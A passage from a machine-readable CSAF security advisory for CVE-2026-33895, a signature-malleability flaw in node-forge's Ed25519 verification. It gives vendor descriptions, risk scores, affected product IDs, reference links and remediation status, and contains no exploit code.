flaw was found in Forge (also called `node-forge`), a JavaScript library used for Transport Layer Security (TLS). The library's Ed25519 signature verification process does not correctly validate cryptographic signatures, allowing forged non-canonical signatures to be accepted. A remote attacker could exploit this signature malleability to bypass authentication and authorization logic. This vulnerability can also circumvent security checks in applications that rely on the uniqueness of cryptographic signatures for functions such as deduplication or preventing replay attacks.", "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33895.json" }, { "category": "description", "text": "Forge has signature forgery in Ed25519 due to missing S > L check", "title": "microsoft - https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2026-Mar" }, { "category": "other", "text": "0.00035", "title": "EPSS" }, { "category": "other", "text": "3.8", "title": "NCSC Score" }, { "category": "other", "text": "There is product_remediation data available from source Redhat", "title": "NCSC Score top decreasing factors" }, { "category": "details", "text": "Severity: 3\n", "title": "Vendor assessment" } ], "product_status": { "known_affected": [ "CSAFPID-5920253", "CSAFPID-5956281", "CSAFPID-1439292", "CSAFPID-1439294", "CSAFPID-1439306", "CSAFPID-1439317", "CSAFPID-1439319", "CSAFPID-1441200", "CSAFPID-1455906", "CSAFPID-1459353", "CSAFPID-1459355", "CSAFPID-1496261", "CSAFPID-1508257", "CSAFPID-1771999", "CSAFPID-1837472", "CSAFPID-1837473", "CSAFPID-2109952", "CSAFPID-2109953", "CSAFPID-2467441", "CSAFPID-2467442", "CSAFPID-2467443", "CSAFPID-2467444", "CSAFPID-2467445", "CSAFPID-2467448", "CSAFPID-2552001", "CSAFPID-2698055", "CSAFPID-2698057", "CSAFPID-2855724", "CSAFPID-2855725", "CSAFPID-2858634", "CSAFPID-2868420", "CSAFPID-2914696", "CSAFPID-2914697", "CSAFPID-5187689", "CSAFPID-5222698", "CSAFPID-5940623", "CSAFPID-5940626", "CSAFPID-5940629", "CSAFPID-5197899", "CSAFPID-5733329" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-q67f-28xg-22rw" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-q67f-28xg-22rw.json?alt=media" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33895" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33895.json" }, { "category": "external", "summary": "Source - redhat", "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33895.json" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - microsoft", "url": "https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2026-Mar" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv; redhat", "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-q67f-28xg-22rw" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-35961" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25793" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv; redhat", "url": "https://github.com/digitalbazaar/forge/commit/bdecf11571c9f1a487cc0fe72fe78ff6dfa96b85" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv; redhat", "url": "https://datatracker.ietf.org/doc/html/rfc8032#section-8.4" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-q67f-28xg-22rw" }, { "category": "external", "summary": "Reference - github; redhat", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33895" }, { "category": "external", "summary": "Reference - redhat", "url": "https://www.cve.org/CVERecord?id=CVE-2026-33895" } ], "remediations": [ { "category": "mitigation", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": [ "CSAFPID-1439292", "CSAFPID-1439294", "CSAFPID-1439306", "CSAFPID-1439317", "CSAFPID-1439319", "CSAFPID-1441200", "CSAFPID-1455906", "CSAFPID-1459353", "CSAFPID-1459355", "CSAFPID-1496261", "CSAFPID-1508257", "CSAFPID-1771999", "CSAFPID-1837472", "CSAFPID-1837473", "CSAFPID-2109952", "CSAFPID-2109953", "CSAFPID-2467441", "CSAFPID-2467442", "CSAFPID-2467443", "CSAFPID-2467444", "CSAFPID-2467445", "CSAFPID-2467448", "CSAFPID-2552001", "CSAFPID-2698055", "CSAFPID-2698057", "CSAFPID-2855724", "CSAFPID-2855725", "CSAFPID-2858634", "CSAFPID-2868420", "CSAFPID-2914696", "CSAFPID-2914697", "CSAFPID-5187689", "CSAFPID-5222698", "CSAFPID-5940623", "CSAFPID-5940626", "CSAFPID-5940629" ] } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-1439292", "CSAFPID-1439294", "CSAFPID-1439306", "CSAFPID-1439317", "CSAFPID-1439319", "CSAFPID-1441200", "CSAFPID-1455906", "CSAFPID-1459353", "CSAFPID-1459355", "CSAFPID-1496261", "CSAFPID-1508257", "CSAFPID-1771999", "CSAFPID-1837472", "CSAFPID-1837473", "CSAFPID-2109952", "CSAFPID-2109953", "CSAFPID-2467441", "CSAFPID-2467442", "CSAFPID-2467443", "CSAFPID-2467444", "CSAFPID-2467445", "CSAFPID-2467448", "CSAFPID-2552001", "CSAFPID-2698055", "CSAFPID-2698057", "CSAFPID-2855724", "CSAFPID-2855725", "CSAFPID-2858634", "CSAFPID-2868420", "CSAFPID-2914696", "CSAFPID-2914697", "CSAFPID-5187689", "CSAFPID-5197899", "CSAFPID-5222698", "CSAFPID-5733329", "CSAFPID-5920253", "CSAFPID-5940623", "CSAFPID-5940626", "CSAFPID-5940629", "CSAFPID-5956281" ] } ], "title": "CVE-2026-33895" } ] }